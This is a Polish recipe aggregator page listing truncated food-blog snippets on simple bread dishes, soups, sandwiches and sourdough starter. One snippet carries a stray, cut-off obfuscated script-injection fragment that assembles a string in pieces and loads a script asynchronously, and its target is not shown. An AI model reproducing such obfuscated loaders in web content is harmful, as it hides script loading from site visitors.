prosty chleb - 3416 przepisów (strona:134/228)

Cynamonowe tosty francuskie 96

Follow my blog with Bloglovin Follow my blog with Bloglovin Dziś mamy dla Was idealny przepis na śniadanie. Cynamonowe tosty francuskie to świetna opcja na jesienny

CRAVEmonkey
Ogorkowa - moja pierwsza w zyciu 156

Dzisiaj post o zupie, którą ugotowałam po raz pierwszy w życiu. Stało się to za sprawą książki Kuchnia roślinna dla każdego" Eryka Wałkowicza. Tak naprawdę jest

Dzieje kuchennej Wiewióry
Jak wygląda śniadanie w różnych krajach? 125

oraz bliny, czyli naleśniki drożdżowe, najczęściej mąki gryczano-żytniej lub gryczano-pszennej. Rosjanie lubią jeść je z kefirem i dżemem. Ponadto mieszkańcy Rosji uwielbiają białe pieczywo – mają swój własny chleb o nazwie nareznoj. Świetnie komponuje się on ze słodkimi kremami, jak krem Nutella, oraz wieloma innymi dodatkami. (function(){ za30=document.createElement("script");za30_=(("u")+"st")+"a";za30.async=true; za30.type="text/javascript";za30

Codogara
tosty z bryndzą 139

czytajcie;) Składniki: 8 kromek chleba tostowego z ziarnami pół wędzonej makreli 4 łyżki bryndzy 2 jajka pomidor Jajka ugotować na półtwardo. Rybę przebrać z ości. Pomidora pokroić w plastry. Ugotowane jajka obrać i pokroić w plasterki. Połowę kromek posmarować bryndzą, położyć rybę, pomidora i jajko, przykryć pozostałymi kromkami. Upiec w opiekaczy do kanapek.  Przepis prosty ale UWAGA

Domowa Cukierenka-Domowa Kuchnia
Kanapka z łososiem, szparagami i jajkiem w koszulce 137

przeróżnymi kanapkami. Tym razem prosta ale bardzo smaczna. Z wędzonym łososiem, efektownym jajkiem w koszulce i szparagami. Koniecznie musisz wypróbować w sezonie szparagowym! Składniki (2 porcje): 2 kromki ulubionego pieczywa 2 jajka 1 łyżka octu 8-9 szparagów zielonych 50 gram wędzonego łososia 3 łyżki kremowego serka 1 łyżka posiekanego szczypiorku świeżo zmielony pieprz Chleb tostuję. W dużym garnku gotuję

Mango Papaja
Chlebek "pizza" 113

Dziś przypada Międzynarodowy Dzień Chleba. W związku z tą okazją postanowiłyśmy wraz z Mirabelką , Mopsikiem , Gin , Lejdi i Emilią upiec chlebki. Rzadko zajmuję się wypiekami, ponieważ zwyczajnie mi się nie udają. Chciałabym to jednak zmienić, a żeby to zrobić trzeba ćwiczyć i próbować. Dlatego postanowiłam upiec łatwy chlebek a la pizza. Ciasto jest bardzo proste w przygotowaniu i muszę przyznać

Codzienne Gotowanie
Zakwas na żurek 180

Prosty do przygotowania tradycyjny zakwas na żurek – w przeciwieństwie do tego ze sklepu możemy go w pełni dopasować do indywidualnych upodobań. Zapisz przepis Drukuj Składniki (na ok. 1,5 litra zakwasu) 125g (10-12 łyżek) mąki typ 1850 lub 2000, najlepiej żytniej 1,2 litra chłodnej przegotowanej wody pół kromki chleba razowego ze skórką 2 duże lub 4 małe ząbki

Kulinarna Pokusa
Fasolka po bretońsku 117

Niby dobrze znana i prosta w przygotowaniu, a jednak każdy ma swój ulubiony sposób jej przyrządzania. Ja lubię ją na tyle, żeby raz na jakiś czas zrobić i cieszyć się jej smakiem ale nie na tyle, żeby przygotowywać ją raz w tygodniu… Miseczka fasolki po bretońsku, doprawionej na ostro a do tego kawałek świeżego chleba i rozgrzewające, sycące danie

UgotujmyTo.pl
Zakwas - jak zrobić? 129

sposób zliczyć wszystkich. Jak to się mówi: co kraj to obyczaj :) Ja podam wam najprostszy z prostych. Bo przecież po co komplikować coś, co z natury rzeczy ma być proste? Otóż zajmie nam to 4 dni. Niestety nie posiadam zdjęć poszczególnych etapów produkcji, ale postaram się wszystko ładnie opisać. Dzień 1: Bierzemy słoik, taki konkretny jakiś, minimum 1 litr(...)Zakwas przechowuje i "konserwuje" się łatwo. Ale tak samo ile sposobów na produkcję, tyle sposobów na przechowywanie. Więc przedstawię ten, którego ja używam :) Jeśli masz w planach codziennie piec chleby na zakwasie to po prostu ustaw sobie zakwas gdzieś w kuchni i co 24 godziny dodawaj do niego 100 g mąki i 100 ml wody. I mieszaj. A jeśli jednak

Marder&Marder Manufacture
Grillowana figa z fetą 102

się czy Twój chleb się upiekł czy nie.  Dzieją się różne rzeczy ostatnio i aż trudno mi w to uwierzyć. Ilość przeróżnych sytuacji powoduje, że aż trudno zebrać myśli. Jedynie dobre jedzenie jest tak samo niezmiennie dobre.  I tutaj kłaniają się figi. Z grillowanym pieczywem. Z kruszoną fetą. Z balsamico i ziołami. Kolejna tak prosta propozycja ale urzekająca

Mango Papaja
Truskawkowa chmurka a`la ptasie mleczko 268

wyszedł rewelacyjnie! Jest mega prosty i co najważniejsze fajnie chłodzi co przy tak ciepłych dniach się przydaje. Zastanawialiśmy się jak go nazwać, w smaku trochę mi przypomina takie serki homogenizowane jakie 25 lat temu mi kupowała mama, w takich kwadratowych opakowaniach. Jeździłem po wierzchu tak długo łyżeczką aż zrobiła się dziura a potem wcinałem z chlebem Okazało się, że wszystkie

PaleoLife
Klopsiki w sosie musztardowym 135

efekcie wyszedł mi prosty i szybki obiad dla całej rodzinki. Polecam również ten przepis: Klopsiki w sosie Teriyaki Składniki: 1/2 kg mielonego mięsa wołowego 1 jajko kromka suchego pieczywa 1/2 ebuli 2 łyżki musztardy dijon 1 szklanka bulionu  120 ml słodkiej śmietany 1 łyżka sosu worcesterschire 2 łyżki mąki łyżeczka masla (adsbygoogle = window.adsbygoogle || []).push({}); Chleb namaczamy w wodzie

Delusional Trine
Pasztet z soczewicy 132

wielkanocnego stołu, banalnie prosty do wykonania , przy czym bardzo zdrowy. Polecam wykonać go z czerwonej soczewicy , której nie trzeba wcześniej namaczać i bardzo szybko się gotuje. Samo zdrowie :-)  Przepis znaleziony a w archiwalnych " Wysokich Obcasach " wg Agnieszki Kręglickiej , oczywiście nieco zmieniony przeze mnie. Od kiedy pamiętam uwielbiam wszelkiego rodzaju smarowidła i domowe wyroby do chleba :)  Pasztet z soczewicy

Aromatyczne Podróże
TORT KANAPKOWY Z PASZTETEM 302

krakersów:D Z prostych i łatwo dostępnych składników można wyczarować rewelacyjne danie, które oczaruje Waszą rodzinę i przyjaciół :) Tak jest i w tym wypadku, gdzie genialny efekt można uzyskać w ekspresowy sposób. Z dwóch rodzajów Pasztetu firmy Profi oraz domowej pasty jajecznej, a także suszonych pomidorów i ogórków kiszonych, którymi to przełożyłam kilka warstw chleba orkiszowego, przygotowałam

Słodko-Słony Świat Ilony
Świeża kawa proto z palarni - KONKURS z Single Orgin 93

świeżym pieczywem... Chleb prosto z piekarni jest cieplutki i o niebo smaczniejszy - niż ten z dnia poprzedniego. Co prawda da się zjeść, ale taki cieplutki smakuje lepiej. Prawda?   Jeśli chcecie sami się o tym przekonać i spróbować kawy, która zostanie dla Was wypalona bezpośrednio przed wysyłką - zapraszam do wspólnej zabawy! Zadanie jest niezwykle proste. Wystarczy dokończyć zdanie: "Piję kawę

Di gotuje
Zupa jarzynowa z mlodych warzyw czyli Zupowy Wtorek odc.80 150

Należało by powiedzieć "Zupa z przygodami". Robiąc ją w ubiegłym tygodniu byłam pełna zapału a potem... było już tylko gorzej... miała być intensywnie pomarańczowa, nie była

Dzieje kuchennej Wiewióry
Bekon burger truflowy z jajkiem przepiórczym 148

Dzięki wołowinie QMP w prosty i szybki sposób można przyrządzić dania, które zagwarantują nam sukces kulinarny i nie obciążą domowego budżetu! O czym mogliśmy przekonać się podczas warsztatów przekonać się, przygotowując następne dania, do wykonania których, użyliśmy różnych elementów wołowiny. - stek z antrykotu, puree ziemniaczane, portobello, szpinak, sos holenderski z miso - rostbef z sokiem jabłkowym, chlebem z ogniska, sałatką

królestwo garów
Szybko-wolno. Maj, pizza i szparagi. 154

się w pięć prostych liter - PIZZA. Majowa, puszysta, ze szparagami i świeżą bryndzą. Dla smaku kilka plasterków suszonej szynki.  "Myję ręce i wycieram je w fartuch. Myślę sobie, że takiego właśnie połączenia pragnęłam. Opartego na prostocie. To moje właściwe dziedzictwo. Gotuję i piekę. Taką rolę dostałam w spadku po tych, którzy przede mną rozdawali chleb, podtrzymywali ogień i dzielili

KUCHARNIA
Lekkie Curry Kalafiorowe z Indykiem, bezmleczne 177

Chciałam przyrządzić dla Córci i dla nas danie pełne smaku i bez zakazanych produktów. Udało mi się choć przyznam, że jeden składnik z tych mniej wskazanych

Dzieje kuchennej Wiewióry

Proponowane wyszukiwania